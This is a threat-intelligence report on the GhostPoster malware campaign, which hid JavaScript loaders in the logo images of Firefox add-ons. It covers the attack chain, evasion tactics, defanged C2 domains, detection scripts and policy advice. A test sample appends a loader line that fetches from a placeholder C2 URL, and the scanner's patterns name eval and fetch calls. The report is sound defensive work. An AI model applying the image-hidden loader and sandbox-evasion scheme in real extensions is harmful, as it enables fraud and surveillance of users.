"GhostPoster" Malware Infects 50,000+ Firefox Users via Malicious Add-ons

GhostPoster Campaign Compromises Over 50,000 Firefox Users with Malicious Browser Extensions

MEDIUM
December 18, 2025
Malware, Cyberattack

Impact Scope

People Affected

50,000+

Related Entities

Organizations

Koi Security

Products & Tech

Mozilla Firefox, Google Translate

Other

GhostPoster

Full Report

Executive Summary

A newly discovered malware campaign, dubbed GhostPoster, has infected over 50,000 Mozilla Firefox users through a collection of 17 malicious browser extensions. First detailed by Koi Security, the campaign used add-ons that posed as popular tools such as VPNs, screenshot utilities, and unofficial versions of Google Translate. The primary goal of the malware was financial gain through affiliate link hijacking and ad/click fraud. The operators hid the initial loader script inside an image file and implemented several evasion techniques that kept the campaign undetected for a prolonged period. The oldest identified malicious add-on was published in October 2024.


Threat Overview

The GhostPoster campaign relied on users installing malicious extensions from the official Firefox add-on store. Once installed, the malware executed a multi-stage infection chain designed for stealth and persistence.

  1. Initial Infection: A user installs one of the 17 malicious add-ons (e.g., "Dark Mode," "Free VPN," "Screenshot").
  2. Payload Hiding: The add-on fetches its own logo file (an image). Hidden within this image, separated by a === marker, is an obfuscated JavaScript loader. This is a form of steganography.
  3. C2 Communication: The loader script attempts to contact one of two command-and-control (C2) domains: www.liveupdt[.]com or www.dealctr[.]com.
  4. Evasion: To avoid detection by security researchers and sandboxes, the loader is programmed with two key evasion tactics:
    • It only attempts to fetch the final payload 10% of the time.
    • It waits 48 hours between each attempt to contact the C2 server.
  5. Final Payload: Upon successful C2 contact, the main malicious payload is downloaded and executed. This payload monitors all browsing activity, injects tracking codes, hijacks affiliate links, and performs click fraud. Researchers also noted it opens a backdoor for potential remote code execution.

Technical Analysis

The use of an image file to hide the initial JavaScript loader is the most notable technique (T1140 - Deobfuscate/Decode Files or Information). This allows the malware to pass initial static analysis of the extension's code, as the malicious logic is not present in a standard .js file. The loader's probabilistic execution (10% chance) and long delay (48 hours) are classic anti-analysis techniques designed to defeat automated sandboxing environments that typically only run for a few minutes.
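A static check that would have caught this trick, written here as an added example (not code from the report or from Koi Security): it opens an extension package (an .xpi is a zip), looks for bytes appended after each image's end-of-file marker, and reports assets that carry a === delimiter or script-like text there. The sample package, the placeholder URL on the reserved .invalid TLD, and the PNG/JPEG-only heuristic are all constructed for the example.

```python
import io
import re
import zipfile

# Byte sequences that terminate a well-formed image file; anything after them is suspect.
# Heuristic written for this example and limited to PNG and JPEG assets.
END_MARKERS = {"png": b"IEND\xaeB`\x82", "jpg": b"\xff\xd9", "jpeg": b"\xff\xd9"}
DELIMITER = b"==="   # separator the report says sits between the image and the loader
SCRIPT_HINTS = re.compile(rb"function\s*\(|=>|eval\(|new\s+Function|fetch\(|XMLHttpRequest")

def trailing_payload(name, data):
    """Return the bytes after the image's end marker: b'' for a clean file or a non-image,
    the whole file when no marker exists. The appended loader is text, so the last
    occurrence of the marker is the real end of the image."""
    ext = name.lower().rsplit(".", 1)[-1]
    marker = END_MARKERS.get(ext)
    if marker is None:
        return b""
    pos = data.rfind(marker)
    return data if pos < 0 else data[pos + len(marker):]

def scan_xpi(xpi_bytes):
    """Open an extension package (an .xpi is a zip) and report image assets that carry
    a === delimiter or script-like text after the image data."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        for info in z.infolist():
            tail = trailing_payload(info.filename, z.read(info))
            if not tail.strip():
                continue
            delimited, scripty = DELIMITER in tail, SCRIPT_HINTS.search(tail) is not None
            if delimited or scripty:
                findings.append({"file": info.filename, "trailing_bytes": len(tail),
                                 "has_delimiter": delimited, "looks_like_script": scripty})
    return findings

def build_sample_xpi():
    """Constructed package for the demo: a clean PNG and a logo with a loader appended.
    The URL uses the reserved .invalid TLD; it is a placeholder, not a real C2."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x00IEND\xaeB`\x82"
    loader = b"===\n(function(){fetch('https://c2.invalid/p')})();"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", '{"manifest_version": 2, "name": "sample"}')
        z.writestr("icons/clean.png", png)
        z.writestr("icons/logo.png", png + loader)
    return buf.getvalue()
```

Calling `scan_xpi(build_sample_xpi())` returns one finding, for icons/logo.png, with both flags set; a real vetting pipeline would run the same scan over every asset in a package before it is approved.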

The ultimate goal appears to be a combination of ad fraud and affiliate hijacking. By monitoring browsing and injecting its own codes, the malware ensures the attackers receive commissions for online purchases or ad clicks made by the victim. The reported backdoor capability suggests the potential for more severe actions, such as deploying infostealers or ransomware.

Impact Assessment

While the primary impact is financial fraud, the implications for the 50,000+ victims are significant. The malware effectively compromises browser security, leading to:

  • Loss of Privacy: The malware monitors all browsing activity, collecting data on user habits and visited websites.
  • Security Downgrade: Researchers stated the malware "strips away your browser's security protections," making the victim more vulnerable to other web-based attacks.
  • Potential for Further Infection: The backdoor functionality creates a persistent entry point on the victim's machine, which could be used to deliver more dangerous malware payloads in the future.

IOCs

Type    Value                 Description
Domain  www.liveupdt[.]com    Command-and-control server
Domain  www.dealctr[.]com     Command-and-control server

Detection & Response

  • Check Extensions: Firefox users should immediately review their installed browser extensions. A list of the 17 malicious add-ons should be available from security vendor reports. Remove any suspicious or unrecognized extensions.
  • Network Monitoring: Monitor network traffic for any connections to the C2 domains www.liveupdt[.]com and www.dealctr[.]com. Block these domains at the firewall or DNS level.
  • D3FEND Technique - D3-DA: Dynamic Analysis: For security teams, analyzing browser extensions in a long-running sandbox environment (more than 48 hours) may be necessary to trigger the delayed C2 callback and observe the malicious behavior.

Mitigation

  • Limit Extensions (M1033 - Limit Software Installation): In an enterprise environment, use browser management policies to create an allowlist of approved extensions, preventing users from installing unvetted software.
  • User Education: Train users to be cautious about installing browser extensions. They should stick to well-known, reputable developers and be wary of extensions with few reviews or recent publication dates.
  • Endpoint Security: Deploy endpoint security solutions with web protection features that can inspect browser traffic and block connections to known malicious domains.

Timeline of Events

  1. October 25, 2024: The oldest malicious add-on associated with the campaign, 'Dark Mode', was first published.
  2. December 18, 2025: This article was published.

MITRE ATT&CK Mitigations

  • In corporate environments, restrict users from installing browser extensions by default. Maintain an allowlist of vetted, necessary extensions.

Mapped D3FEND Techniques:

  • Use DNS filtering or web proxies to block access to known malicious C2 domains like those used by GhostPoster.
  • Educate users about the risks of installing untrusted browser extensions and how to spot potentially malicious ones.

D3FEND Defensive Countermeasures

To combat threats like GhostPoster, organizations should treat browser extensions as executable code and apply strict controls. Implement a policy of denylisting all browser extensions by default using Group Policy (GPO) for Edge/Chrome or browser management solutions for Firefox. Then, create a curated allowlist of extensions that are approved for business use after a thorough security vetting. This approach prevents users from installing potentially malicious add-ons from web stores. The 17 add-ons identified in the GhostPoster campaign should be explicitly added to the denylist so that they are automatically removed from any managed browser where they are already installed. This preventive measure significantly reduces the attack surface presented by browsers.
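The deny-by-default allowlist described here (and in the Mitigation list above) expressed as a Firefox enterprise policy, as an added example rather than anything from the report: the function builds the `ExtensionSettings` block for policies.json with every extension blocked by default, vetted IDs allowed, and known-bad IDs blocked by name. The extension IDs are constructed placeholders; the report does not list the 17 GhostPoster add-on IDs, so those must come from the vendor write-ups.

```python
import json

def firefox_extension_policy(allowed_ids, blocked_ids, message):
    """Build a Firefox enterprise policy (policies.json) that blocks every extension by
    default, allows only vetted IDs, and explicitly blocks known-bad IDs so Firefox
    removes them from managed profiles where they are already installed."""
    overlap = set(allowed_ids) & set(blocked_ids)
    if overlap:
        raise ValueError(f"IDs listed as both allowed and blocked: {sorted(overlap)}")
    settings = {"*": {"installation_mode": "blocked", "blocked_install_message": message}}
    for ext_id in allowed_ids:
        settings[ext_id] = {"installation_mode": "allowed"}
    for ext_id in blocked_ids:
        settings[ext_id] = {"installation_mode": "blocked"}
    return {"policies": {"ExtensionSettings": settings}}

def render_policy(policy):
    """Serialize for /etc/firefox/policies/policies.json (or distribution/policies.json)."""
    return json.dumps(policy, indent=2, sort_keys=True)

# Constructed placeholders: the report does not list the add-on IDs of the 17 GhostPoster
# extensions, so obtain those from the vendor write-ups and substitute them here.
ALLOWED = ["vetted-extension@example.com"]
BLOCKED = ["ghostposter-addon-1@placeholder.invalid", "ghostposter-addon-2@placeholder.invalid"]

if __name__ == "__main__":
    print(render_policy(firefox_extension_policy(ALLOWED, BLOCKED,
                                                 "Extensions must be approved by IT.")))
```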

Given GhostPoster's use of C2 servers for its second stage, network traffic analysis is a key detection strategy. Security teams should ingest DNS query logs, proxy logs, and firewall logs into a SIEM and create detection rules that alert on any internal host attempting to resolve or connect to the known malicious domains www.liveupdt[.]com and www.dealctr[.]com. Because the malware waits 48 hours between C2 attempts, it is also important to analyze logs retroactively: when new C2 domains for such campaigns are published, run historical queries against network logs for the past 30-60 days to identify previously unnoticed compromised systems. This can uncover dormant infections before they cause further harm.
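The retroactive hunt described above, as an added example (not a rule from the report): it refangs the two IOC domains, also watches the parent of each www. host (an assumption that the operators control the whole domain), and reports first/last sighting and hit count per client for queries inside the look-back window. The DNS log format and the sample lines are constructed; one client beacons on the report's 48-hour cadence, one query is older than the window, and one look-alike name must not match.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# C2 domains exactly as the report lists them (defanged).
C2_DOMAINS = ["www.liveupdt[.]com", "www.dealctr[.]com"]
# Constructed log format for this example: "<ISO timestamp> <client ip> <query name> <qtype>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def refang(domain):
    """Turn a defanged indicator into a matchable hostname."""
    return domain.replace("[.]", ".").lower().rstrip(".")

def expand_indicators(indicators):
    """Refang, plus the parent of each 'www.' host (assumption: operators own the domain)."""
    out = {refang(d) for d in indicators}
    return out | {i[4:] for i in out if i.startswith("www.")}

def hunt(log_lines, indicators, now_iso, lookback_days=60):
    """Map client -> first/last sighting and hit count for DNS queries that equal or fall
    under a C2 domain within the look-back window (the report suggests 30-60 days)."""
    iocs = expand_indicators(indicators)
    cutoff = datetime.fromisoformat(now_iso) - timedelta(days=lookback_days)
    hits = defaultdict(lambda: {"first": None, "last": None, "hits": 0})
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client = datetime.fromisoformat(m.group(1)), m.group(2)
        q = m.group(3).lower().rstrip(".")
        if ts < cutoff or not any(q == i or q.endswith("." + i) for i in iocs):
            continue
        rec = hits[client]
        rec["first"] = ts if rec["first"] is None else min(rec["first"], ts)
        rec["last"] = ts if rec["last"] is None else max(rec["last"], ts)
        rec["hits"] += 1
    return dict(hits)

# Constructed sample: one host beaconing on the 48-hour cadence, one hitting a sibling
# label, one query older than the window, and one look-alike that must not match.
SAMPLE_LOG = """\
2025-12-10T09:12:01 10.0.4.17 www.liveupdt.com A
2025-12-12T09:12:05 10.0.4.17 www.liveupdt.com A
2025-12-14T22:40:11 10.0.7.3 cdn.dealctr.com A
2025-09-01T08:00:00 10.0.9.9 www.dealctr.com A
2025-12-15T10:00:00 10.0.5.5 liveupdt.com.example.net A
""".splitlines()
```

`hunt(SAMPLE_LOG, C2_DOMAINS, "2025-12-18T00:00:00")` flags 10.0.4.17 (two hits, 48 hours apart) and 10.0.7.3; the September query falls outside the 60-day window and the look-alike never matches.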

Sources & References

GhostPoster Malware Found in 17 Firefox Add-ons with 50,000+ Downloads. The Hacker News (thehackernews.com), December 17, 2025.
GhostPoster Malware in Firefox Add-ons Infects Over 50,000 Users. Cyber Security News (cybersecurity-news.com), December 17, 2025.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Browser Extension, Malware, Firefox, Ad Fraud, Affiliate Hijacking, GhostPoster
